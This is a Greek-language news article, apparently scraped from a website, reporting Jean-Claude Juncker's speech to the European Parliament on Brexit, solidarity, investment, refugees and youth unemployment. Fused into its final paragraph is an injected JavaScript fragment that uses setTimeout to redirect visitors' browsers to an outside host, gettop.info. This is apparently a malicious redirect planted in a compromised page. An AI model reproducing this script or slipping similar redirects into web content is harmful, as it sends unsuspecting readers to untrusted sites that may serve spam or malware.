Γιούνκερ: Η Ευρώπη δεν είναι αρκετά κοινωνική – Χρειάζεται περισσότερη αλληλυεγγύη

0
6

 

Στην ετήσια ομιλία του προς το Ευρωπαϊκό Κοινοβούλιο ο πρόεδρος της ΕΕ Ζαν Κλοντ Γουνκερ εστειλε μήνυμα ενότητας και αλληλεγγύης στους Ευρωπαίους τονίζοντας πως η Ευρωπαϊκή Ένωση χρειάζεται περισσότερη αλληλεγγύη, η οποία πρέπει να προσφέρεται εθελοντικά, δεν είναι κάτι που μπορεί να επιβληθεί.

«Προτείνουμε τη σύσταση ενός ευρωπαϊκού σώματος αλληλεγγύης», τόνισε και από την αρχή της ομιλίας αναφέρθηκε στο Brexit επισημαίνοντας πως «σεβόμαστε την απόφαση της Βρετανίας να αποχωρήσει από την ΕΕ και τη σεβόμαστε…Η ύπαρξη της Ευρωπαϊκής Ενωσης δεν απειλείται από το Brexit». Αναφορικά με το διαζύγιο Βρετανίας-ΕΕ υπογράμμισε πως το Brexit πρέπει να υλοποιηθεί το συντομότερο δυνατόν, ώστε οι σχέσεις του Ηνωμένου Βασιλείου με την ΕΕ να λάβουν μορφή. «Δεν μπορεί να υπάρχει α-λα καρτ πρόσβαση στην ενιαία αγορά».

Σχετικά με την Ευρωπαϊκή Ένωση σχολίασε πως αυτή δεν είναι αρκετά κοινωνική και «αυτό πρέπει να το αλλάξουμε. Δεν είμαστε οι Ηνωμένες Πολιτείες της Ευρώπης. Η Ευρωπαϊκή Ενωση είναι πιο περίπλοκη».

Επιπλέον, ο κ. Γιούνκερ πρότεινε «ένα νομικό πλαίσιο για επενδύσεις στις συνδέσεις Ιντερνετ υψηλής ταχύτητας». Η Ευρωπαϊκή Επιτροπή θέλει σύνδεση 5G σε όλη την Ευρώπη μέχρι το 2025, πρόσθεσε.

Για το Κυπριακό είπε ότι η επανένωση της Κύπρου πρέπει να γίνει και πρέπει να γίνει τώρα. Στηρίζω τους δύο ηγέτες

Επίσης, υπογράμμισε πως οι χώρες της ευρωζώνης εξοικονόμησαν 50 δισ. ευρώ φέτος χάρη στη νομισματική πολιτική της ΕΚΤ. Ο Γιούνκερ είπε ότι θα πρέπει να απαντήσουμε δραστικά στο ντάμπινγκ όπως κάνουν οι ΗΠΑ ενώ πρόσθεσε ότι η ΕΕ θα πρέπει να υπερασπιστεί τη δική της βιομηχανία χάλυβα.

Ακόμη πρότεινε διπλασιασμό του «πακέτου Γιούνκερ» λέγοντας: «Προτείνω μία θετική ατζέντα για τους επόμενους δώδεκα μήνες. Για να ξεπεράσουμε τις διαιρέσεις και να δείξουμε στην Ευρώπη ότι μπορούμε να δράσουμε από κοινού.Προτείνουμε τον διπλασιασμό της διάρκειας και των πόρων του προγράμματος επενδύσεων της ΕΕ» στα 620 δισεκατομμύρια ευρώ μέχρι το 2020«.

Για το προσφυγικό, απηύθυνε έκκληση στην Ελλάδα για προστασία ασυνόδευτων παιδιών που βρίσκονται στο έδαφός της και σημείωσε πως οποιοσδήποτε εισέρχεται στην Ευρωπαϊκή Ένωση ή φεύγει από την Ευρωπαϊκή Ένωση θα καταγράφεται. Η ασφάλεια των συνόρων σημαίνει ανταλλαγή πληροφοριών μεταξύ των υπηρεσιών πληροφοριών και μεγαλύτερο ρόλο της Europol, δήλωσε ο Ζαν-Κλοντ Γιούνκερ. «Χρειαζόμαστε έναν ευρωπαίο υπουργό Εξωτερικών», τόνισε.

Για την ανεργία που ταλανίζει την ΕΕ ανέφερε πως «Δεν μπορώ και δεν θέλω να δεχθώ η Ευρώπη να είναι μία ήπειρος σημαδεμένη από την ανεργία των νέων. Πρέπει να επενδύσουμε στην αντιμετώπιση των ανθρωπιστικών κρίσεων στην Ευρώπη. Περισσότερο από οτιδήποτε άλλο, οφείλουμε να επενδύσουμε στους νέους» συμπλήρωσε. Δεν μπορώ να δεχθώ η γενιά Υ να είναι η πρώτη γενιά που θα είναι φτωχότερη από τους γονείς της ανέφερε.

Και συμπλήρωσε πως η ανεργία παραμένει πολύ υψηλή στην Ευρώπη. Και το χρέος συνεχίζει να είναι σε πολύ υψηλό επίπεδο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here